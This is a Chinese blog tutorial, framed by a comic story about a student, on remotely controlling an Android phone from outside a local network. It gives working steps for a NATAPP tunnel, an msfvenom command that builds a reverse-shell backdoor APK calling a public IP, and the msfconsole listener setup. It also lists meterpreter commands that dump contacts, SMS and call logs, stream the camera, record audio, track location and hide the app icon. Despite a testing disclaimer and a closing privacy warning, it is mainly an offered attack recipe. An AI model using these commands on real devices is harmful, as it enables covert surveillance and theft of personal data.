安卓局域网外实现木马监听

外网监听安卓——未知网络的隐患

特此声明:

此分享只用于局域网安全测试以及无线网络工作原理的学习,不可用于有损于他人的局域网正常工作及网络安全*
此分享中的所有局域网测试都在私人网络环境中进行,未对他人的正常生活造成干扰

话接上回,自从二狗子的隔壁少了些许吵杂以后,每日的闲暇使得二狗子猛然觉得,这本就方寸之地,在这白昼与黑夜之间切换又开始变得索然无味了。二狗子觉得该干点什么。。。他在那张凌乱不堪的桌子上静静的等着,就如同以为以猎物的方式出现的猎人一般。

最近二狗子迷上一款“我只是帮朋友看看“的这么一款软件。若要说起这款软件从何而来,还得从他的舍友口中得知。

据二狗子的舍友提起,自从二狗子本人从前段封校的那段时间开始,由于无聊,便在好奇心的趋势下,加入了一群聊。并常常抱着手机在群聊中无声的偷笑,在群外放声的傻笑。就这样,某天在各种言语的渲染之下,二狗子的手被自己”附魔“一般,主动点开了被一堆文字与表情包裹,那最显眼的蓝色链接。。。。。

二狗子你听说了吗?舍友吃饭间,抬头向一旁正在一边吃着饭,一边眼睛死死盯住发着微光手机屏的二狗子问道,”前段时间好像三楼有一小伙被”诈骗“了,还好像通过什么手机里面有个什么马的玩意,哈哈!记得历史课上还提到过一次”特洛伊木马“,算了我也不懂“。

此时的二狗子,突然咬断了刚送进口中,但半截还在碗中的拉面。猛然间他使劲按了一下安卓手机电源键,关上了手机屏,快速的起身一边把左手的手机装进右手边的裤兜里,一边给舍友道别说到,”哎,你们先吃哈,我有点事,得去趟宿舍。“,这话还没说到一半,只见人已经把碗筷放到餐具回收处,在餐厅的门口只留下了一个背影。

他的两三个舍友嘴中未下咽的米饭,混合着吱吱呀呀的闲聊,只能熙熙攘攘的听到一句。”这小子呀,估计去收网去了。“就在这句话刚说出口的那一瞬间,餐厅又好像瞬刻安静,但又以常人察觉不到的瞬间又恢复了他们几人刚进来的那种状态。


局域网监听系统:kali-2021.3

虚拟机:VMware-16-pro

隧道搭建软件:Linux64bit NATAPP-PHP客户端

安卓版本:Android 10

隧道搭建

  • 为了更加真实的模拟,使设备可以脱离局域网不受空间的限制。我们就需要搭建一个内网穿透的隧道,实现的原理大致就是。安卓端与监听终端由于ip是独立内网中无法被暴露,所以我们就需要一个中转的桥梁或隧道,而NATAPP就是一个可以独立于Linux端的客户端,通过NATAPP的隧道搭建,即就可以实现,上述目的。关于内网穿透,其实在那篇关于 Linux外网远程登录访问内网主机 的文章中就有提到过有兴趣的可以瞅瞅哈。

    {% btn 'https://peggy-m.top/2021/11/1/linux-wai-wang-yuan-cheng-deng-lu-fang-wen-nei-wang-zhu-ji/ ', Linux外网远程登录访问内网主机,far fa-hand-point-right,purple larger %}
  1. NATAPP客户端下载安装

    • 隧道搭建这里推荐一款网上使用率较高的软件NATAPP,之前在 {% label Linux外网远程登录访问内网主机 orange %} 的这篇文章中采用的是花生壳,但这款软件搭建起来步骤比较繁琐,

    登录NATAPP官网 NATAPP

    • 这里只需要下载对应的版本即可

NATAPP.cn.png

  • 找到更目录的下载位置,直接复制,粘贴到虚拟机中的Kali中即可。

    kalinatapp

  1. NATAPP隧道配置
    • 登录NATAPP官网,购买免费隧道

隧道搭建

  • 登录NATAPP官网,购买免费隧道并配置隧道协议为TCP

    隧道协议

  • 查看本地Kali的ip地址,在kali终端中输入ifconfig本地ip

    ifconfig

  • 在配置面板,进行隧道配置

    配置面板

  1. 启动NATAPP,查看服务器ip

    • 输入语句
    ./natapp -authtoken=***************
    

    ************************************代表的为NATAPP控制面板中authtoken密匙

    authtoken

  • 此时便可以在终端中看到以下结果(这个终端不可以关闭,相当于一个中转)

    authtoken2

  • 在Windows端的CMD命令中输入指令

    ping server.natappfree.cc 
    

    ping

  • 此时我们便自爱CMD端得到了一个IP地址,该IP地址就是“隧道”,我们随后便就通过这条“隧道”在局域网外监控安卓端

  1. 开始生成安卓小马

    • 输入以下代码(相当于搭建本地生成一个可以与natapp服务器对接的安卓端木马软件)
    msfvenom -p android/meterpreter/reverse_tcp LHOST=112.74.89.58 LPORT=38573 R > android_backdoor.apk #android
    

    LHOST:这里是我们隧道的IP地址 112.74.89.58

    LPORT:这里是我们隧道的端口号 38573

    android_backdoor.apk:生成APK的名称 默认生成目录在家目录中

apk

apk

  • 把刚才生成的小马发送给需要监控的安卓端
  1. 开始远程监控
    • 启动 msfconsole
    • 在终端输入 msfconsole

msfconsloe

  • 然后依次输入以下命令(设置本地监听的地址与端口)

    use exploit/multi/handler
    
    set payload android/meterpreter/reverse_tcp
    
    set lhost 192.168.188.135  本地kali地址
    
    set lport 55555 
    
    run
    

run

  • 此时就已经开启了远程渗透监听,现在只需要在安卓端点击一下小马软件即可。

  • 当然在点击以后软件并不会打开,只是在后台运行

  1. 指令测试
  • 远程导出手机信息

  • 开启手机摄像头

    img4

    img3

    img2

通过上面的测试,大家应该可以感受到,其实在这个数据与网络编制的新时代,虽然我们在享受利用着网络带来的各种便捷,但同时在某方面也增大了我们个人隐私的安全隐患。

所以提醒大家,尽量不要随意连接未知的不明WiFi,更不要浏览非法网站,通过非正规的网站下载应用app。或许你在追求快乐与刺激的同时,摄像头的那边正有一双眼睛盯着你的一切。

当然这里只是一个简单的测试,现在的手机在安全隐私方面都比较强。上述测试中所用到的软件,很难对窃取到他人的隐私。软件只用于测试,不会用于非法用途,天网恢恢。

测试常用指令


    webcam_list  列出网络摄像头 

    sysinfo查看手机信息

    webcam_stream开启摄像头

    dump_contacts导出电话号码

    dump_sms导出短信信息

    webcam_snap通过摄像头拍照功能

    record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒

    webcam_chat  开始视频聊天

    webcam_snap  从指定的摄像头获取快照

    webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]

    activity_start  从URI字符串启动Android活动

    check_root  检查设备是否有根

    dump_calllog  获取调用日志

    dump_contacts  获取联系人列表

    dump_sms  获取短信

    geolocate  利用地理定位获取当前LAT

    wlan_geolocate  利用WLAN信息获取当前LAT

    hide_app_icon  从发射器隐藏应用程序图标 

    interval_collect  管理区间收集能力 

    send_sms  从目标会话发送短消息 

    set_audio_mode 

    sqlite_query  从存储库查询SQLite数据库

    wakelock  启用/禁用Wakelock
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值